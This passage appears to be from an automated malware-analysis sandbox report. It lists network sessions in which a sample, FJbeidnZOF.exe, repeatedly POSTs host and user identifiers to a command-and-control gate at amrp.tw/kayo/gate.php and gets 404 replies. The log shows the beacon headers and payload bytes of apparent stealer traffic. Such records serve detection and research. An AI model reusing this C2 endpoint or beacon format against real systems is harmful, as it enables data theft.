                                            Apr 29, 2021 09:18:58.988575935 CEST1234OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:59.492105007 CEST1234INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            12192.168.2.34974135.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:00.024704933 CEST1235OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:00.273252964 CEST1235OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:00.742952108 CEST1236INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            13192.168.2.34974235.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:01.421406031 CEST1236OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:01.666986942 CEST1237OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:02.138453007 CEST1237INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            14192.168.2.34974335.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:03.174503088 CEST1238OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:03.420962095 CEST1238OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:03.889556885 CEST1238INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            15192.168.2.34974435.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:04.404731989 CEST1239OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:04.651185036 CEST1239OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:05.126091003 CEST1240INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            16192.168.2.34974535.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:05.661257029 CEST1240OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:05.906627893 CEST1241OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:06.550230980 CEST1241INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            17192.168.2.34974635.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:07.091418028 CEST1242OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:07.340069056 CEST1242OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:07.810693979 CEST1242INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:08 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            18192.168.2.34974735.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:08.631181955 CEST1243OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:08.877872944 CEST1243OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:09.346967936 CEST1244INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            19192.168.2.34974835.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:09.846277952 CEST1245OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:10.096031904 CEST1245OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:10.716794014 CEST1245INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.34972535.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:46.975892067 CEST1148OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:47.225796938 CEST1149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:47.695468903 CEST1149INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            20192.168.2.34974935.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:11.264755964 CEST1246OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:11.510535002 CEST1246OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:11.974939108 CEST1247INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            21192.168.2.34975035.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:12.481081963 CEST1248OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:12.726524115 CEST1249OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:13.478480101 CEST1256INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            22192.168.2.34975335.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:13.981782913 CEST1257OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:14.227679014 CEST1257OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:14.695132017 CEST1257INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            23192.168.2.34975435.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:15.458383083 CEST1258OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:15.708937883 CEST1259OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:16.174881935 CEST1259INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            24192.168.2.34975535.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:17.051023006 CEST1260OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:17.299782991 CEST1260OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:17.768065929 CEST1260INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            25192.168.2.34975635.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:18.349585056 CEST1261OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:18.602802038 CEST1262OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:19.075193882 CEST1262INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            26192.168.2.34975735.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:19.940011024 CEST1263OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:20.184983015 CEST1263OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:20.677717924 CEST1263INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            27192.168.2.34975835.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:22.226751089 CEST1264OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:22.476785898 CEST1264OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:22.945744038 CEST1265INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            28192.168.2.34975935.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:23.478948116 CEST1266OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:23.725191116 CEST1266OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:24.203675032 CEST1266INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            29192.168.2.34976035.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:24.710110903 CEST1267OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:24.956533909 CEST1267OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:25.420600891 CEST1267INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
